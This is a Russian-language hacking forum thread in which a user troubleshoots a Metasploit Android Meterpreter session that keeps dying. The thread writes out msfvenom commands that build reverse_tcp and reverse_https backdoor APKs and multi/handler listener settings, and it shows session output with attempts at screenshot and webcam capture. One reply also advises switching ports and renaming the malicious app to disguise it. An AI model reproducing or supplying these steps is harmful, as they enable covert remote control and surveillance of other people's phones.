PDA

Просмотр полной версии : Получение meterpreter - сессии на Andriod


vunya
02.04.2018, 18:29
Добрый день !
Не могу понять по какой причине рвется сессия, открытая на андроид-смарте.

Сгенерирован пэйлоад:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -a dalvik --platform android -o /root/xiaomi/abc.apk

Его забросил на свой девайс.
Заупскаю Мультихэндлер, запускаю арк на смарте и получаю вот такое:

msf exploit(multi/handler) > run

Started reverse TCP handler on 192.168.1.104:4444
Sending stage (70031 bytes) to 192.168.1.103
Sleeping before handling stage...
Meterpreter session 16 opened (192.168.1.104:4444 -> 192.168.1.103:47010) at 2018-04-02 17:08:57 +0300
192.168.1.103 - Meterpreter session 16 closed. Reason: Died

Опции:
Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.104 yes The listen address
LPORT 4444 yes The listen port

ghostphisher
02.04.2018, 22:43
reverse_https стоит попробовать

vunya
03.04.2018, 10:28
благодарю
получилось получить сессию, правда какаую-то странную
ни одна команда не выполняется

meterpreter > screenshot
[-] Error running command screenshot: Rex::TimeoutError Operation timed out.
meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > ifconfig
[-] Error running command ifconfig: Rex::TimeoutError Operation timed out.
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter >

ghostphisher
03.04.2018, 10:43
1) msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.104 LPORT=4444 -a dalvik --platform android -o /root/xiaomi/abc.apk
2)msf exploit(multi/handler) >
set payload android/meterpreter/reverse_https
set lport 4444
set lhost
run
3) Порт указать который ранее не использовался, если все время долбили 4444,ставим 6789 и название меняем у полезного приложения.